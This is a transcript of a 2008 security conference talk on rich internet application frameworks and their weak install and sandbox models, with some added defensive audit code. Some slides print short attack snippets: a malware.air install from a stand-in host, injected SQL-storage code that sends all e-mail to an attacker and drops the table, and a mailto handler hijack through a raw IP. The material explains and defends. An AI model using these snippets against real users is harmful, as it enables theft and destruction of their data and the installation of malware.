Ria World Bh 2008
Transcript of Ria World Bh 2008
7/29/2019 Ria World Bh 2008
1/199
Living in the RIA World

Outline
Introduction
  Who are we?
  What's a RIA?
  Why use RIA?
Frameworks
  Adobe AIR
  MS Silverlight
  Google Gears
  Y! BrowserPlus
  Mozilla Prism
  HTML 5
Attack Scenarios
  RIA vs OS
  RIA vs the web
  RIA vs RIA
Living in the RIA World:
Blurring the Line between Web and Desktop Security
Alex Stamos, David Thiel, Justine Osborne
iSEC Partners
August 6, 2008
What's a RIA? Rich Internet Applications
- As with Web 2.0, ill-defined
- May contain some of the following ingredients:
  - AJAXy Flashiness
  - Local storage
  - Offline mode
  - Decoupling from the browser
  - Access to lower level OS resources: sockets, hardware devices
  - Appearance of a traditional desktop application
- Our research has shown a huge disparity in features and security design
Why use a RIA?
- Web 2.0 no longer gets you VC funding
- To increase responsiveness: distribute data stores between server and client
- Desktop integration: take advantage of OS UI functionality
- Never learned any real programming languages
- In short, web developers can now write full desktop apps. This could be good or bad.
RIA Frameworks: Fight!
Adobe AIR: Quick Summary
Feature matrix (the yes/no mark for each item is only in the original slide):
- Runs disconnected
- Standalone app
- Privileged OS access
- Can launch itself
- Local data storage
- Has an installer
- Raw network sockets
- Cross-domain XHR
- Dedicated session management
- Can talk to the calling DOM
- IPC mechanisms
- Proper SSL security
Adobe AIR
What is Adobe AIR?
- So it's just like a Win32 program in the eyes of a security analyst?
- Um, not really
- Power of AIR is the I in RIA
- Can be invoked by browser with arguments, like ActiveX or Flash
- Has many native mechanisms for loading external content
- Highly likely that developers will utilize Internet content. That's the point.
- AIR is best thought of as an ActiveX or Full Trust .NET analogue, and not like Flash++
- Code runs with full privileges, can install malware
- Native mechanisms allow for interaction with the untrusted world
- Fortunately, Adobe seems to have learned some lessons from ActiveX
Adobe AIR Instantiation
- AIR applications are identified by an appID and pubID
- pubID is calculated from developer personal information and certificate
- SWF files can import functionality that allows them to interact with AIR applications. From Adobe:

    airSWFLoader.load(new URLRequest("http://airdownload.adobe.com/browserapi/air.swf"), loaderContext);

- With the airSWF classes, the SWF can check on the application's install status and version:

    airSWF.getApplicationVersion(appID, pubID, versionDetectCallback);

- Now that we know the version, we can instantiate:

    airSWF.launchApplication(appID, pubID, arguments);
Adobe AIR Security Model
- By default, code included in an AIR application has full rights
- New functionality in privileged APIs added to JavaScript and ActionScript
- Some restrictions on interacting with the desktop in AIR 1.0
- Existing capabilities can be chained to run native code
- Rumors of additional native code capabilities in future releases
- No code access security model as understood on other systems, such as Java or .NET
- Instead, five pre-defined sandboxes with fixed capabilities:
  - Application: full perms. Default for code included with the AIR app
  - Remote: code downloaded from the internet. Browser-like permissions
  - Three intermediate permission levels for local SWFs
- AIR has many ways of loading executable content to run, such as HTML/JS and SWFs
- Also many ways of getting external untrusted data:
  - Network traffic
  - Arguments from browser invocation
  - Command line arguments
- Application Sandbox is not supposed to be able to dynamically generate code
  - eval() is the best example in JS
  - Goal is to eliminate the XSS and injection attacks that have plagued Flash apps, which have more kick with local privileges
- Seems like a reasonable security precaution. How will web developers circumvent it?
- They can look for mistakes in Adobe's classification of methods
- Better yet, use a Sandbox Bridge
  - Official method of moving data between sandboxes
  - An application can attach functions or variables to an object available from multiple sandboxes
  - Documented as passing by value, not reference, although this doesn't jive with how functions work
- First the parent sets up the Sandbox Bridge:

    var highRightsStuff = {};
    highRightsStuff.writeToFile = function(name, content) {
        // Write to file with air.FileStream
    };
    document.getElementById("child").contentWindow.parentSandboxBridge = highRightsStuff;

- Then child code (in an IFRAME) can access the function:

    window.parentSandboxBridge.writeToFile(name, content);
Installing AIR
- AIR requires Flash 9
- Can be installed via an external binary or from inside Flash (screenshot in the original slide)
Installing an AIR Application
- AIR applications can be bundled as binaries (*.air)
- Can also be installed by a web page from inside a SWF:

    var url:String = "http://www.cybervillains.com/malware.air";
    var runtimeVersion:String = "1.0";
    var arguments:Array = ["launchFromBrowser"];
    airSWF.installApplication(url, runtimeVersion, arguments);

- Creates an Open/Save prompt
- Adobe supports signing AIR applications with commercial certificates
- Gives you this prompt (screenshot in the original slide)
- Notice the default selection
- Unfortunately, they also support self-signed certificates
- Gives you this prompt (screenshot in the original slide)
- Actually, looks more like pre-IE7 ActiveX
- What am I complaining about? They give the correct information
- True, but so did ActiveX
- Allowing users to install signed applets is dangerous enough
- Allowing self-signed (which is the same as unsigned) is terrifying
- The popularity of ActiveX in IE5 and IE6 and the ability of web sites to pop open infinite prompts made it the premier malware seeding mechanism
- Adobe Flash is more popular than IE ever was
- It's almost impossible to install ActiveX now. That's not an accident.
Some suggestions
- Change the default action
- Add a countdown timer to discourage mindless clickthrough
- There is already a registry key to disable unsigned install prompts; turn it on by default
- Stop distributing self-signed AIR applications from Adobe.com
- There is perhaps room for something between AIR and Flash without the rootkit abilities
Questions about Silverlight
Feature matrix (the yes/no mark for each item is only in the original slide):
- Runs disconnected
- Standalone app
- Privileged OS access
- Can launch itself
- Local data storage
- Has an installer
- Raw network sockets
- Cross-domain XHR
- Dedicated session management
- Can talk to the calling DOM
- IPC mechanisms
- Proper SSL security
Microsoft Silverlight: What is Silverlight?
What is Silverlight?
Cross browser plugin comparable in functionality to Flash
Subset of the .NET framework
Two versions:
Silverlight 1.0: released
Silverlight 2.0: beta 2
Silverlight Bits
.XAP: .ZIP container for Silverlight apps
XAML: Extensible Application Markup Language
CoreCLR: CLR for .NET lite (simplified CAS)
XBAP: XAML Browser Applications (CAS)
Managed Controls: System.Windows.Forms UserControl subclasses (CAS)
Microsoft Silverlight: XAML
XAML sample (image; only its two text labels survived extraction): "Bigger Cat", "Smaller Cat"
Microsoft Silverlight: XAML in Action (image; no text survived extraction)
Microsoft Silverlight: Silverlight Security Model
Silverlight's simplified Code Access Security
SecurityTransparent: Silverlight developer code, code sans attribute
SecuritySafeCritical: New bridge code from Microsoft
SecurityCritical: Slimmed .NET 3
This code will fail:

    using System.IO;
    // SecurityTransparent application code may not touch the file system directly.
    File.Create("dumpstermuffin.exe");

This code will succeed:

    using System.IO;
    using System.IO.IsolatedStorage;
    // The per-application isolated store is the sandboxed file API offered to app code.
    IsolatedStorageFile isf = IsolatedStorageFile.GetUserStoreForApplication();
    isf.CreateFile("relativePath");

This code will also fail:

    using System.IO;
    using System.IO.IsolatedStorage;
    // "COM3" is a reserved Windows device name, so the isolated store refuses it.
    IsolatedStorageFile isf = IsolatedStorageFile.GetUserStoreForApplication();
    isf.CreateFile("COM3");
Microsoft Silverlight: Isolated Storage
Isolated Storage
The default storage quota is 1 MB per application
Storage is isolated per AppDomain
You can deny local storage
Microsoft Silverlight: Network Sockets
Network Sockets
TCP socket connections, limited port range 4502 - 4534
Requires clientaccesspolicy.xml (even to host of origin)
Microsoft Silverlight: Cross-domain and DOM access
Cross-domain access and access to the hosting DOM can be configured via:
clientaccesspolicy.xml and crossdomain.xml
Application manifest
Object parameters passed to the plugin
enableHtmlAccess = false (default setting for cross-domain)
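The two preceding slides say that both socket connections and cross-domain requests from Silverlight are gated by a clientaccesspolicy.xml on the target host. The following is an added example, not code from the slides: it parses such a policy file and answers whether a calling origin may reach a resource path or a socket port, then flags the over-broad settings an auditor would look for. Both policy documents are constructed samples, the parser handles only the elements the format uses, and the origin glob is a simplification of Silverlight's matching rules; those are assumptions of this example.

```javascript
// Added example (not from the slides): evaluate and audit a Silverlight
// clientaccesspolicy.xml. Purpose-built parser for this format only; the
// origin glob is a simplification of Silverlight's rules (assumption).

// Constructed sample: the "allow everything" policy tutorials hand out.
const PERMISSIVE_POLICY = `<?xml version="1.0" encoding="utf-8"?>
<access-policy>
  <cross-domain-access>
    <policy>
      <allow-from http-request-headers="*">
        <domain uri="*"/>
      </allow-from>
      <grant-to>
        <resource path="/" include-subpaths="true"/>
      </grant-to>
    </policy>
  </cross-domain-access>
</access-policy>`;

// Constructed sample: one partner origin, one API subtree, and sockets only
// inside the 4502-4534 range Silverlight permits.
const SCOPED_POLICY = `<?xml version="1.0" encoding="utf-8"?>
<access-policy>
  <cross-domain-access>
    <policy>
      <allow-from http-request-headers="Content-Type">
        <domain uri="https://partner.example"/>
      </allow-from>
      <grant-to>
        <resource path="/api/public/" include-subpaths="true"/>
        <socket-resource port="4502-4534" protocol="tcp"/>
      </grant-to>
    </policy>
  </cross-domain-access>
</access-policy>`;

// Read one attribute out of a self-closing tag such as <domain uri="..."/>.
function attr(tag, name) {
  const m = new RegExp("\\b" + name + '\\s*=\\s*"([^"]*)"').exec(tag);
  return m ? m[1] : null;
}

// One entry per <policy> block: allowed origins, granted paths, socket port ranges.
function parsePolicy(xml) {
  const policies = [];
  const policyRe = /<policy>([\s\S]*?)<\/policy>/g;
  let block;
  while ((block = policyRe.exec(xml)) !== null) {
    const body = block[1];
    policies.push({
      domains: [...body.matchAll(/<domain\b[^>]*\/>/g)].map(m => attr(m[0], "uri")),
      resources: [...body.matchAll(/<resource\b[^>]*\/>/g)].map(m => ({
        path: attr(m[0], "path"),
        includeSubpaths: attr(m[0], "include-subpaths") === "true",
      })),
      socketPorts: [...body.matchAll(/<socket-resource\b[^>]*\/>/g)].map(m => attr(m[0], "port")),
    });
  }
  return policies;
}

function escapeRe(s) { return s.replace(/[.*+?^${}()|[\]\\]/g, "\\$&"); }

// "*" matches any origin; otherwise "*" stands for any run of characters
// ("http://*", "https://*.example.com"). Simplified glob, an assumption here.
function originAllowed(pattern, origin) {
  if (pattern === "*") return true;
  const re = new RegExp("^" + pattern.split("*").map(escapeRe).join(".*") + "$", "i");
  return re.test(origin);
}

function pathGranted(resource, path) {
  return resource.includeSubpaths ? path.startsWith(resource.path) : path === resource.path;
}

function isRequestAllowed(policies, origin, path) {
  return policies.some(p =>
    p.domains.some(d => originAllowed(d, origin)) && p.resources.some(r => pathGranted(r, path)));
}

function isSocketAllowed(policies, origin, port) {
  return policies.some(p =>
    p.domains.some(d => originAllowed(d, origin)) &&
    p.socketPorts.some(range => {
      const [lo, hi] = range.split("-").map(Number);
      return port >= lo && port <= (hi === undefined ? lo : hi);
    }));
}

// The grants a reviewer would push back on.
function auditPolicy(policies) {
  const findings = [];
  policies.forEach((p, i) => {
    if (p.domains.includes("*")) findings.push(`policy ${i}: any origin is allowed (domain uri="*")`);
    p.domains.forEach(d => {
      if (/^http:\/\//i.test(d)) findings.push(`policy ${i}: allows a plaintext origin (${d})`);
    });
    p.resources.forEach(r => {
      if (r.path === "/" && r.includeSubpaths) findings.push(`policy ${i}: grants the entire site (path="/" with include-subpaths)`);
    });
  });
  return findings;
}
```

Run `auditPolicy(parsePolicy(xml))` over a deployed policy file; an empty result means no wildcard origin, no plaintext origin, and no whole-site grant. Note the request check ignores the `http-request-headers` attribute, which only governs which headers a cross-domain caller may set.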
Questions about Gears
Feature checklist for Gears (the yes/no marks did not survive extraction): Runs disconnected; Standalone app; Privileged OS access; Can launch itself; Local data storage; Has an installer; Raw network sockets; Cross-domain XHR; Dedicated session management; Can talk to the calling DOM; IPC mechanisms; Proper SSL security
Google Gears
Uses a homegrown API for synchronizing data
Local SQLite instance used for data storage
LocalServer hosts content locally for offline access
Works offline via SQL database, local assets, and a local app server, LocalServer
LocalServer acts as a broker between the browser and webserver
Changes behavior depending on online status
Implements a WorkerPool to perform intensive Javascript calculations outside of the browser
Google Gears: Security mechanisms
Uses same origin to restrict access to site databases and LocalServer resource capture
Provides for parameterized SQL
Opt-in user dialog
Gears 0.3 allows for customization of this dialog...
Google Gears: Not a great feature... (image; no text survived extraction)
Google Gears: Workerpool abuse
Workerpools allow intensive tasks that would normally trigger tight loop detection to run uninterrupted
Due to the ease of tricking users into installing Gears apps, this makes an attractive target for distributed malicious tasks
Applications for hash cracking, remote site attacks
Questions about Yahoo! BrowserPlus
Feature checklist for BrowserPlus (the yes/no marks did not survive extraction): Runs disconnected; Standalone app; Privileged OS access; Can launch itself; Local data storage; Has an installer; Raw network sockets; Cross-domain XHR; Dedicated session management; Can talk to the calling DOM; IPC mechanisms; Proper SSL security
Yahoo! BrowserPlus: A challenger appear
Designed to allow for new browser plugins to be easily deployed and updated
"To address security, we've followed the same web security precedent set by browser developers."
But it's even worse than that...
Initialized by including http://bp.yahooapis.com/2.0.6/browserplus-min.js
No, you can't do that over SSL
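The point of the last two lines is that every page which bootstraps BrowserPlus pulls its loader script over plain HTTP, so anyone on the network path can substitute the script. The following is an added example, not code from the slides or from Yahoo!: a scanner that lists the script includes a page loads over plaintext, which is the check a reviewer would run over a site before allowing such an include. The HTML document is a constructed sample; the only real URL in it is the BrowserPlus loader quoted above.

```javascript
// Added example (not from the slides): find <script src=...> includes that
// a page fetches over plain HTTP. The sample page is constructed; the
// bp.yahooapis.com URL is the loader the slide quotes.
const SAMPLE_PAGE = `<!doctype html>
<html><head>
<script src="http://bp.yahooapis.com/2.0.6/browserplus-min.js"></script>
<script type="text/javascript" src="https://cdn.example/lib.js"></script>
<script src='//cdn.example/proto-relative.js'></script>
<script src="/local/app.js"></script>
<script>var inline = 1;</script>
</head><body></body></html>`;

// Pull the src attribute out of every <script> tag; handles double-quoted,
// single-quoted and bare attribute values, and skips inline scripts.
function scriptSources(html) {
  const out = [];
  const re = /<script\b[^>]*\ssrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    out.push(m[1] !== undefined ? m[1] : (m[2] !== undefined ? m[2] : m[3]));
  }
  return out;
}

// Classify a script URL given the scheme of the page that includes it.
// Protocol-relative ("//host/...") and relative ("/path") URLs inherit the
// page's scheme, so they are plaintext exactly when the page itself is.
function classifyScriptSrc(src, pageScheme) {
  if (/^https:\/\//i.test(src)) return "https";
  if (/^http:\/\//i.test(src)) return "plaintext";
  return pageScheme === "https" ? "https" : "plaintext";
}

// The list a reviewer wants: includes an on-path attacker could replace.
function findPlaintextScripts(html, pageScheme) {
  return scriptSources(html).filter(s => classifyScriptSrc(s, pageScheme) === "plaintext");
}
```

On an https:// page the scanner reports only the absolute http:// include (the BrowserPlus loader); on an http:// page it also reports the protocol-relative and same-origin includes, because those inherit the page's plaintext scheme.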
Yahoo! BrowserPlus: Architecture
Runs as a browser plugin, with a separate helper process
Allows pages to request handy corelets, installed on-demand, like:
Imagemagick for local image processing
Flickr uploadr
Notifications via Growl/Snarl
and a Ruby interpreter
These execute code on the local machine as the current user
In short, it's ActiveX
Yahoo! BrowserPlus: About this Ruby business...
Included version: 1.8.6p0
Perfectly safe, as long as you don't use strings or arrays
Yahoo! BrowserPlus: Beating up old ladies
Of course, BrowserPlus isn't totally baked yet
In Sneak Peek phase
Currently, only works with Yahoo! sites
All modules must be signed by Yahoo!
But this has to change before it can be widely adopted
Also lacks some polish...
"A description of the componennt oogabooga momma bite me yeah yeah yeah."
Actual Yahoo! content
Yahoo! BrowserPlus: Summary
This is a very dangerous idea.
Allows for buggy native code apps of any type to be deployed with no sandboxing or sitelocking.
All runs as a browser plugin rather than an extension or control: full privilege.
Corelets are signed, but can overwrite each other after signature verification (and be updated dynamically)
Bad code can supposedly be revoked, but it can override revocation mechanisms.
Bottom line: unsafe at any speed.
Mozilla Prism: Quick Summary
Feature checklist for Prism (the yes/no marks did not survive extraction): Runs disconnected; Standalone app; Privileged OS access; Can launch itself; Local data storage; Has an installer; Raw network sockets; Cross-domain XHR; Dedicated session management; Can talk to the calling DOM; IPC mechanisms; Proper SSL security
Mozilla Prism
Formerly WebRunner; wraps webapps to appear as desktop apps
Standalone browser instance, restricted to one domain
External links open a regular browser
Separate user profile
Certificate errors are a hard failure
Consists of a webapp bundle with id, URI, CSS, scripting and UI rules in an INI:

    [Parameters]
    id=isec.site@isecpartners.com
    uri=https://www.isecpartners.com/
    icon=isec
    status=no
    location=no
    sidebar=no
    navigation=no
Mozilla Prism: Example bundles (image; no text survived extraction)
Mozilla Prism: Bundles
Javascript included with webapp bundles has full XPCOM privs (but not content scripting privs)
Script in 3rd-party bundles allows modifying browser behavior just like an extension
Unlike add-ons, no mechanism for signing or verifying goodness of webapp bundles
Mozilla Prism: Prism Install UI (image; no text survived extraction)
Mozilla Prism: Abuse
Looks like a bookmark dialog
No warnings for install
Full XPCOM scripting privileges
Low bar for trojans and malicious code: a malicious browser extension, but with no code signing or warning
HTML 5: New features in Firefox and WebKit
The standards-based approach
Introduces DOM storage: sessionStorage and localStorage
sessionStorage stores arbitrary amounts of data for a single session
localStorage persists beyond the session, never expires, limited to 5M
Database storage via openDatabase()
All expected to be same-origin
DOM Storage

The major goals of DOM storage: more storage space and real persistence
Cookies considered too small
Users delete cookies, or won't accept them
DOM storage bypasses pesky users
However, pesky users can use:
  about:config dom.storage.enabled = false
Browser-based SQL Databases: DatabaseJacking

Injection attacks become far more damaging when you can insert code like this:

var db = openDatabase("e-mail", [], "My precious e-mail", "3.14");
allmessages = db.executeSql("SELECT * FROM MSGS", [], function(results) {
  sendToAttacker(results);
});
db.executeSql("DROP TABLE MESSAGES", [], function() {
  alert("lol");
});
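The slides above describe DOM storage as same-origin and show what an injected script can reach. As an added example (not from the deck), here is a reviewer-side audit of a Web Storage area that flags credential-looking contents and reports usage against the 5M limit; FakeStorage, the patterns and the sample entries are constructed for this example.

```javascript
// Added example, not from the deck: audit a Web Storage area the way a
// reviewer would. Every script in the origin, injected ones included, can
// read it, so credential-looking contents are findings, and usage is reported
// against the 5 MB figure from the slide.
class FakeStorage {                       // stand-in for the browser object
  constructor(entries) { this.map = new Map(Object.entries(entries)); }
  get length() { return this.map.size; }
  key(i) { const keys = [...this.map.keys()]; return i < keys.length ? keys[i] : null; }
  getItem(k) { return this.map.has(k) ? this.map.get(k) : null; }
}

// Patterns a reviewer would not want to find in client-side storage (assumed set).
const SENSITIVE_PATTERNS = [
  ["JWT", /^[A-Za-z0-9_-]{10,}\.[A-Za-z0-9_-]{10,}\.[A-Za-z0-9_-]{10,}$/],
  ["e-mail address", /[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}/],
  ["card-like number", /\b\d{13,16}\b/],
];
const SENSITIVE_KEY = /token|session|passw|secret|auth|cookie/i;

function auditStorage(storage, quotaBytes = 5 * 1024 * 1024) {
  const findings = [];
  let bytesUsed = 0;
  for (let i = 0; i < storage.length; i++) {
    const key = storage.key(i);
    const value = storage.getItem(key) || "";
    bytesUsed += (key.length + value.length) * 2;   // UTF-16 code units
    if (SENSITIVE_KEY.test(key)) findings.push({ key, issue: "key name suggests a credential" });
    for (const [label, re] of SENSITIVE_PATTERNS) {
      if (re.test(value)) findings.push({ key, issue: `value looks like a ${label}` });
    }
  }
  const pctOfQuota = Math.round((100 * bytesUsed) / quotaBytes);
  if (pctOfQuota >= 80) findings.push({ key: null, issue: `storage at ${pctOfQuota}% of quota` });
  return { bytesUsed, pctOfQuota, findings };
}

// Constructed sample contents, as an injected script in the same origin would see them.
const SAMPLE = new FakeStorage({
  "ui.theme": "dark",
  "auth_token": "eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJhbGljZSJ9.sflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c",
  "draft.to": "bob@example.com",
});

for (const f of auditStorage(SAMPLE).findings) console.log(f.key, "->", f.issue);
```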
Firefox 3: Mozilla-specific issues

Cross-Site XMLHttpRequest removed in late FF3 betas, but it may return
globalStorage
  FF2 has weak same-origin restrictions
  FF2 and FF3 both omit any UI to view/change/delete
  Deprecated in HTML 5 for localStorage
The RIA world is totally SQL-happy
  Downloads, cookies, form history, search history, etc, all stored in local SQLite databases
  Why?? This data isn't relational.
Firefox 3: Additional fun

Speaking of tracking and data storage...
Did you have History turned off? FF3 may have turned it back on.
Also new in FF3: nsIdleService, idle tracking through XPCOM
EXSLT: eXtensible Stylesheet Language Transformations weren't extensible enough, so here are the extensions. Thankfully, XSLT has been bug-free.
Websites can now be protocol handlers: a novel way to implement spyware
Firefox 3: Protocol Handlers

Set up a dumb proxy, forwarding traffic to the real handler IP (and rewriting Host: headers)
Register a new protocol handler thusly:

navigator.registerProtocolHandler("mailto",
  "http://123.142.120.129:8080/dc/launch?action=compose&To=%s",
  "Yahoo! Mail");

Use your malicious IP instead of a name, users won't know the difference
The only security restriction is that the handler has to go to the domain trying to install it.
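As an added check (not from the deck), auditHandler() below models the one rule the slide names, that the handler template must be same-origin with the registering page, and adds the warnings a reviewer would raise on the registration shown above; the heuristics and the sample page URLs are assumptions, not browser behaviour.

```javascript
// Added example, not from the deck: audit a navigator.registerProtocolHandler()
// registration. Firefox 3's only rule was that the handler template be
// same-origin with the registering page; auditHandler() models that rule and
// adds the warnings a reviewer would raise on the slide's mailto example.
// The heuristics and sample URLs below are assumptions, not browser behaviour.

// Words from the display name that a user would expect to see in the host.
function brandWords(title) {
  return title.toLowerCase().split(/[^a-z]+/).filter((w) => w.length >= 3 && w !== "mail");
}

function auditHandler(registeringPageUrl, scheme, template, title) {
  const warnings = [];
  let page, handler;
  try {
    page = new URL(registeringPageUrl);
    handler = new URL(template.replace("%s", "probe")); // make the template parseable
  } catch (err) {
    return { allowed: false, reason: "unparseable URL", warnings };
  }
  // The browser's own check: the handler must live on the registering origin.
  if (handler.origin !== page.origin) {
    return { allowed: false, reason: `cross-origin handler ${handler.origin} from ${page.origin}`, warnings };
  }
  if (!template.includes("%s")) {
    return { allowed: false, reason: "template has no %s placeholder", warnings };
  }
  if (handler.protocol !== "http:" && handler.protocol !== "https:") {
    return { allowed: false, reason: "handler must be http(s)", warnings };
  }
  // Reviewer heuristics beyond what the browser enforces.
  if (handler.protocol === "http:") {
    warnings.push(`plain-http handler: every ${scheme}: link the user opens travels in the clear`);
  }
  if (/^\d{1,3}(\.\d{1,3}){3}$/.test(handler.hostname)) {
    warnings.push("handler host is a raw IPv4 literal; the user has no name to recognise");
  }
  const words = brandWords(title);
  if (words.length > 0 && !words.some((w) => handler.hostname.includes(w))) {
    warnings.push(`display name "${title}" is not reflected in host ${handler.hostname}`);
  }
  return { allowed: true, reason: "same-origin", warnings };
}

// The registration from the slide, audited from the page that would install it.
const SLIDE_TEMPLATE = "http://123.142.120.129:8080/dc/launch?action=compose&To=%s";
console.log(auditHandler("http://123.142.120.129:8080/", "mailto", SLIDE_TEMPLATE, "Yahoo! Mail"));
```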
Firef